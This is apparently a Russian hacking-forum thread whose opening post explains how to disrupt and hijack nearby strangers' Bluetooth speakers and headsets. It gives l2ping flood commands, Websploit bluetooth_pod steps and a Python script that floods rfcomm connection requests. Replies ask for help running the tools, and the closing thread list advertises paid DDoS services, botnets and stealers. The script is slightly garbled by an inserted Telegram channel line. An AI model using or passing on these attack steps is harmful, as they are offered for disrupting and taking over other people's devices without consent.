DDoS Bluetooth устройств. Отключаем всё вокруг.

S

SSHMAN

Original poster
1582472123345.png

На свете существует не так много вещей, которые бесят практически всех без исключения. Это весенне-осенняя слякоть, летнее отключение горячей воды и школьники с переносными Bluetooth-колонками. И если с первыми двумя стихийными бедствиями сделать практически ничего нельзя, то с третьим вполне можно бороться, причем почти без криминала. Как? Об этом и поговорим.

Если современные Wi-Fi-роутеры способны фильтровать нежелательные пакеты, то большинство адаптеров Bluetooth, мягко говоря, туповаты. Им по большому счету безразлично, какой пакет и какого объема, а уж тем более сколько этих пакетов ты пришлешь. Поэтому нам не составляет абсолютно никакого труда увеличить в Linux информационный объем пакета ping до огромного значения, а потом отослать этих пакетов на девайс с Bluetooth, скажем, 1000 штук.

Теперь по порядку. Для начала нам нужно найти подходящие устройства в зоне досягаемости. Для этого используем команду

$ hcitool scan

В результате этой нехитрой манипуляции ты получишь список доступных устройств с Bluetooth с их MAC-адреса. Если твоя система не видит адаптер Bluetooth, то я рекомендую поставить один из менеджеров Bluetooth для Linux. В Kali лично мне подошел gnome-bluetooth, который можно установить следующей командой:

$ apt-get install gnome-bluetooth

Еще можно воспользоваться утилитой blueman:

$ apt-get install blueman

Получив список потенциальных жертв, можно расправиться с их синезубыми девайсами несколькими способами. Рассмотрим каждый по отдельности.


Первый способ: l2ping.
Воспользуемся такой командой:

$ l2ping -i hci0 -s <packet value> -f <MAC_address>

Она сгенерирует пакеты указанного тобой в параметре <packet value> объема и будет отсылать эти пакеты на MAC-адрес, записанный в качестве параметра <MAC_address>. В конце концов ты увидишь такую картину: в терминале время отклика будет постепенно увеличиваться, а на атакуемом устройстве, скорее всего, просто отключится Bluetooth. Через какое-то время он все равно включится, но музыка прервется, и некоторое удовлетворение будет получено.


Второй способ: Websploit.
Существует более элегантный и удобный способ заглушить колонку, из которой доносятся жизнерадостные звуки рэпа. Запускаем утилиту Websploit:

$ websploit

Набираем в консоли команду

$ show modules

Она продемонстрирует нам все модули, которые работают с этой утилитой. Там есть множество компонентов, работающих с Wi-Fi, но нас интересует конкретно модуль bluetooth/bluetooth_pod:

$ use bluetooth/bluetooth_pod

Теперь нужно настроить все параметры и указать сведения об атакуемом устройстве:

$ show options
$ set bdaddr <MAC_address>

Чтобы точно и наверняка угробить Bluetooth, мы изменим размер отсылаемого пакета:

$ set size 999

Все подготовительные действия завершены, можем запускать нашу «машину для убийств»:

$ run

На выходе мы увидим абсолютно похожую картину: пинги становятся дольше, а музыка прерывается. Красота!

Эти два способа будут работать практически с любыми блютусными колонками, гарнитурами и прочими похожими устройствами. Просто потому, что производители не выпускают для них новые прошивки, способные фильтровать входящие пакеты. Так что, если у тебя есть ноутбук с «Линуксом» на борту, ты точно можешь назвать себя грозой портативных колонок.

Если колонка справляется с атакой, можно попробовать отправить пакеты на сам телефон, к которому она подключена. Лично я тестировал этот метод на довольно мощной портативной колонке (JBL Xtreme), и она более-менее справлялась с нагрузкой. Но дешевые китайские поделки такая атака вырубает на раз.


Про готовые джаммеры.
В интернете продаются любопытные товары, среди которых можно найти и глушилки частот. Стоят они обычно приличных денег и предоставляют разные возможности. Одни могут валить практически все сигналы мобильной сети, Wi-Fi и Bluetooth разом, а другие не справятся и с H+.

Если ты считаешь, что тебе действительно необходим подобный товар, то перед его приобретением настоятельно рекомендую ознакомиться с действующим законодательством. В России покупать и продавать глушилки не запрещено, однако если ты решишь воспользоваться ей, то необходима регистрация устройства в ГКРЧ. Если тебя поймают на использовании незарегистрированного девайса, то, скорее всего, оштрафуют по статье 13.4 КоАП РФ. Штраф для физических лиц на сегодняшний день составляет 500 рублей, для юридических — до 10 тысяч.


Подключаемся к чужому девайсу.
Как мы уже знаем, примитивные колонки и гарнитуры почти никогда не фильтруют пакеты, которые мы им отправляем. Но что будет, если отослать такому девайсу не просто пакет с данными для проверки связи (ping), а пакет с запросом на подключение к устройству? И не один.

Не все производители подобных гарнитур позаботились о защите от переполнения буфера. Если все пакеты становятся в очередь, то что произойдет, когда складировать запросы уже будет некуда? Колонка попытается выполнить команду и при этом очистить буфер.

Поэтому мы используем стандартный протокол обмена данными по Вluetooth — rfcomm. Но так как сама утилита, контролирующая протокол, не позволит нам отправить тысячу таких запросов, мы напишем небольшой скрипт на Python, который автоматизирует процесс.

#!/usr/bin/env python
import subprocess

cmd=['rfcomm', 'connect', '<MAC_address>', '1']

for i in range(0, 1001):
subprocess.call(cmd)
TG chanel @social_engineering
print('Connecting...')

Перед запуском скрипта нам нужно узнать MAC-адрес устройства. Для этого используем уже знакомую команду hcitool scan, а полученный адрес вставляем в скрипт вместо <MAC_address>. Теперь сохраняем скрипт и запускаем его:

$ python <FileName>

Сработает скрипт или нет, зависит от модели атакуемого девайса, вернее, от скорости заполнения буфера. Если буфер успеет забиться до его очистки, то команда будет выполнена, и тогда мы подключимся к колонке одновременно с основным пользователем. Если же буфер очистится, то ничего не получится и придется перезапустить скрипт.

Если наш сценарий успешно выполнен, мы можем устроить свою дискотеку или вырубить устройство. Мои личные эксперименты с колонкой JBL Xtreme привели к ее отключению, а вот JBL Flip 2 когда-то удавалось и перехватывать (сейчас ее под рукой нет).
 
P

Pusja

Original poster
помоги пожалуйста, не совсем понял на счёт как чексать mac адресa hcitool. тоясб я пытался через hcitool не работает. щас пытаюсь через blueman тоже не робит.
 
F

fu11p0w3r

Original poster
помоги пожалуйста, не совсем понял на счёт как чексать mac адресa hcitool. тоясб я пытался через hcitool не работает. щас пытаюсь через blueman тоже не робит.
Нормальным языком объясни что у тебя конкретно не получается и , возможно, я смогу тебе помочь
 
J

Jonny 98200316

Original poster
Ребят, помогите установить websploit, весь интернет перелопатил, не помогло)
Тот что был на гит хабе уже не запускается)
 
L

liserginwithoutface

Original poster
Через termux получится реализовать?
 
Название темы
Автор Заголовок Раздел Ответы Дата
V Ожидает оплаты Venom DDoS attack Спам / Флуд / Ддос 0
Emilio_Gaviriya Статья Как работает Анти-DDoS. Уязвимости и взлом 0
Kevin_attack Ожидает оплаты KEVIN DDOS SERVICE / ATTACKS FROM ANOTHER DIMENSION Спам / Флуд / Ддос 0
M Ожидает оплаты DDoS - attacks Ищу работу. Предлагаю свои услуги. 1
Support81 Победителей не будет: авторы Tor вступают в неравный бой с DDoS-атаками Новости в сети 0
Support81 CISA заявило о DDoS-атаках: хакеры хотят дестабилизировать ситуацию в мире Новости в сети 0
N ✅ (РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS ✅ Ищу работу. Предлагаю свои услуги. 2
Shainy На проверке Shainy DDoS Service / Заказать DDOS услуги по приятной цене.Купить DDOS атаку.DDOS Услуги. / 24/7 / Гарант. Ищу работу. Предлагаю свои услуги. 1
S Scrooge_service! DDOS нового уровня! Корзина 2
D нужна услуга по атаку спам флуд DDos по адекватной ценеб плочу BTC Вопросы и интересы 1
V Закрыто Virtyal Attack Service DDoS!Заказать Атаку на Сайт!Качество/Гарантия/Анонимность! Корзина 1
F Закрыто Заказать DDOS услуги по адекватной цене. Купить DDOS атаку. DDOS Услуги. Ддос за крипту Корзина 1
C Layer 4 DDOS Tool Python Спам / Флуд / Ддос 0
X ИЩЕМ ЛУЧШИЙ В МИРЕ СЕРВИС ПО ПРЕДОСТАВЛЕНИЮ ЗАЩИТЫ В КЛИРНЕТ И ONION ОТ ЛЮБЫХ DDOS АТАК! Предоставляю работу. Ищу специалиста. 1
Ddoscrabs Продавец Premium ddos от Crabs Спам / Флуд / Ддос 17
G Интересно Самый бюджетный DDoS сервис Уязвимости и взлом 1
M Закрыто top-class DDoS service Корзина 1
G ✅Recommend✅ Innovative Technologies off Ddos Service. Ищу работу. Предлагаю свои услуги. 1
J [Service] DDoS Услуги Спам / Флуд / Ддос 3
W Проверено Service DDOS Attack DDOS Атака на заказ. Работаем 24/7 from WEB503 Спам / Флуд / Ддос 3
D ---->Daddy DDoS Service <----- | Устрани конкурента | Лучшие на рынке! Спам / Флуд / Ддос 1
E Проверено Online Service DDoS attack/Заказ Ddos услуг круглосуточно. Спам / Флуд / Ддос 2
A Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
Antonka_1000 У кого нибудь прога для DDOS'а серверов CS1.6???? Вопросы и интересы 4
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
S Куплю приватный ботнет для DDOS атак Куплю/Продам 0
D [Service]MASSIVE DDOS/ Мгновенное тестирование вашего ресурса. Ищу работу. Предлагаю свои услуги. 8
S Service DDOS Attack/ДДОС Атака на заказ. Профессионалы к вашим услугам. Спам / Флуд / Ддос 2
G Аренда DDOS мощностей с помесячной оплатой,хватит переплачивать псевдо ддосерам.(V 1.0) Спам / Флуд / Ддос 2
jsbypass >>> DDOS-SERVICE <<< | ЗАКАЗАТЬ ДДОС | ДДОС НА ЗАКАЗ Ищу работу. Предлагаю свои услуги. 2
0 Проверено DDoS Stresser|Best Layer7 Power| Устрани своего конкурента| Спам / Флуд / Ддос 28
D DDoS SerVice #1(Устраняем ваших конкурентов) Ищу работу. Предлагаю свои услуги. 0
J Предлагаю вам качественные услуги DDoS Attack Спам / Флуд / Ддос 1
NickelBlack DDOS SYN Flood Spam/DDOS/Malware 3
D Положим (сделаем недоступным) сайт! Ddos-сервис к вашим услугам! Проведём мощную ддос-атаку, устраним конкурентов легко и быстро! Спам / Флуд / Ддос 1
S Как защитить сайт от DDos Атак? Вопросы и интересы 2
Denik Интересно Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты Уязвимости и взлом 1
N Предоставляю услуги по устранению сайтов и серверов с помощью DDOS атак.Наш сервис поможет решить ваши проблемы с конкурентами. Спам / Флуд / Ддос 0
S Продам SpideHost - Абузоустойчивые VPS/VDS + VIP FastFlux, MassScan, DDOS, AntiDDOS Сайты/Хостинг/Сервера 0
NickelBlack BlackNET Botnet v3.5 [Stealer+Keylogger+DDOS] .NET 24
L Интересно Участник «Сколково» защитит МТ5-брокеров от DDoS-атак Новости в сети 0
D Обучение DDos Вопросы и интересы 0
Denik Интересно DDOS сайта при использовании WordPress Уязвимости и взлом 1
L Интересно Домены биржи Binance подверглись DDoS-атаке Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE ddos сайта Проекты Private Keeper 5
T Набор в состав, для Ddos атак! Предоставляю работу. Ищу специалиста. 0
P Проверено =>MAGNIT-DDoS Attack Service!Оперативно,Круглосуточно,Качественно! Спам / Флуд / Ддос 6
X ⁣ ЗАКАЗАТЬ DDoS АТАКУ // МОЩНЫЙ СЕРВИС!!! Ищу работу. Предлагаю свои услуги. 1
A Защита от DDoS атак Anti-DDoS PRO Ищу работу. Предлагаю свои услуги. 0
T Продам Уникальный DDOS-Сервис Спам / Флуд / Ддос 4

Название темы